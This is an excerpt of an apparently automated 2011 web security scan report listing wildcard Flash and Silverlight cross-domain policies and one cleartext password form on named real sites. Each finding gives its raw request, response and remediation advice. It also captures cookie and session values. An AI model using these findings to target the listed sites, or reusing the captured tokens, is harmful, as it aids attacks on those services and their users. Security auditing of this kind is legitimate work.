<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
...[SNIP]...

4.16. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=27
Expires: Thu, 12 May 2011 00:09:12 GMT
Date: Thu, 12 May 2011 00:08:45 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.17. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Wed, 11 May 2011 19:48:38 GMT
Expires: Thu, 12 May 2011 19:48:38 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 17841

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.18. http://nanpa.org/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: nanpa.org

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:38 GMT
Server: Apache
Last-Modified: Fri, 03 Apr 2009 17:47:04 GMT
ETag: "b42233-e2-466aa22f81600"
Accept-Ranges: bytes
Content-Length: 226
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.resourcenter.net" />
...[SNIP]...

4.19. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=101
Expires: Thu, 12 May 2011 00:10:25 GMT
Date: Thu, 12 May 2011 00:08:44 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.20. http://support.sprint.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://support.sprint.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: support.sprint.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: TLTSID=37A49F687C31107C04C5A75B3A5FEB23; Path=/; Domain=.sprint.com
Set-Cookie: Apache=173.193.214.243.1305161164990996; path=/
Last-Modified: Thu, 13 May 2010 20:15:53 GMT
Accept-Ranges: bytes
Content-Length: 313
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.sprint.com" secure="false" />
...[SNIP]...

4.21. http://w.sharethis.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 06 May 2011 17:23:38 GMT
ETag: "30106-14a-4a29ec0155a80"
Content-Type: application/xml
Date: Thu, 12 May 2011 01:07:14 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

4.22. http://www.awltovhc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.awltovhc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.awltovhc.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Thu, 12 May 2011 00:05:02 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

4.23. http://www.dslreports.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dslreports.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dslreports.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 00:45:47 GMT
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 07 May 2008 23:58:53 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.targetscope.com" />
<allow-access-from domain="www.broadbandreports.com" />
<allow-access-from domain="www.dslreports.com" />
<allow-access-from domain="dev.dslreports.com" />
<allow-access-from domain="www.aggiejy.com" />
<allow-access-from domain="216.254.95.41" />
<allow-access-from domain="*.catt.com" />
...[SNIP]...

4.24. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.151.61
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

4.25. http://www.nanpa.org/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nanpa.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nanpa.org

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:57 GMT
Server: Apache
Last-Modified: Fri, 03 Apr 2009 17:47:04 GMT
ETag: "b42233-e2-466aa22f81600"
Accept-Ranges: bytes
Content-Length: 226
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.resourcenter.net" />
...[SNIP]...

4.26. http://www.stumbleupon.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 18 Oct 2010 23:13:33 GMT
Content-Type: application/xml
Content-Length: 460
Date: Thu, 12 May 2011 00:46:54 GMT
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
   <allow-access-from domain="cdn.stumble-upon.com" />
...[SNIP]...

4.27. http://anpisolutions.app4.hubspot.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://anpisolutions.app4.hubspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: anpisolutions.app4.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 22:47:20 GMT
Accept-Ranges: bytes
ETag: "04cb8acf11c81:cb38"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 00:46:22 GMT
Connection: close
Set-Cookie: HUBSPOT95=521213100.0.0000; path=/

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...

4.28. http://i.dslr.net/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.dslr.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.dslr.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1321405504"
Last-Modified: Wed, 13 Jun 2007 02:10:02 GMT
Content-Length: 239
Connection: close
Date: Thu, 12 May 2011 00:45:55 GMT
Server: lighttpd/1.4.28

<cross-domain-policy>
<allow-access-from domain="www.broadbandreports.com"/>
<allow-access-from domain="www.dslreports.com"/>
<allow-access-from domain="dev.dslreports.com"/>
<allow-access-from domain
...[SNIP]...

4.29. http://twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:49:03 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1305161343531352; path=/; expires=Thu, 19-May-11 00:49:03 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Thu, 12 May 2011 01:19:03 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.30. http://www.vonage.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vonage.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:50:30 GMT
Server: Apache
Last-Modified: Thu, 21 Feb 2008 11:50:31 GMT
ETag: "2046e4-bf-446a9b66f2fc0"
Accept-Ranges: bytes
Content-Length: 191
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<allow-access-from domain="www.vonage-media.co.uk" />
<allow-access-from domain="vonage-media.co.uk" />
</cross-domain-policy>

5. Silverlight cross-domain policy  previous  next
There are 5 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Thu, 12 May 2011 00:47:35 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 01:07:20 GMT
Date: Thu, 12 May 2011 01:07:20 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.3. http://metrics.connectedplanetonline.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.connectedplanetonline.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.connectedplanetonline.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:47:47 GMT
Server: Omniture DC/2.0.0
xserver: www70
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.4. http://metrics.sprint.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:32 GMT
Server: Omniture DC/2.0.0
xserver: www138
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.5. http://metrics.vonage.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.vonage.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.vonage.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:50:42 GMT
Server: Omniture DC/2.0.0
xserver: www19
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6. Cleartext submission of password  previous  next
There are 2 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://forum.link2voip.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.link2voip.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
Host: forum.link2voip.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phpbb3_82ha5_u=1; phpbb3_82ha5_k=; phpbb3_82ha5_sid=c8a27ebe829b8494c7b1d53ed606faba

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:45:01 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Content-Length: 39662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
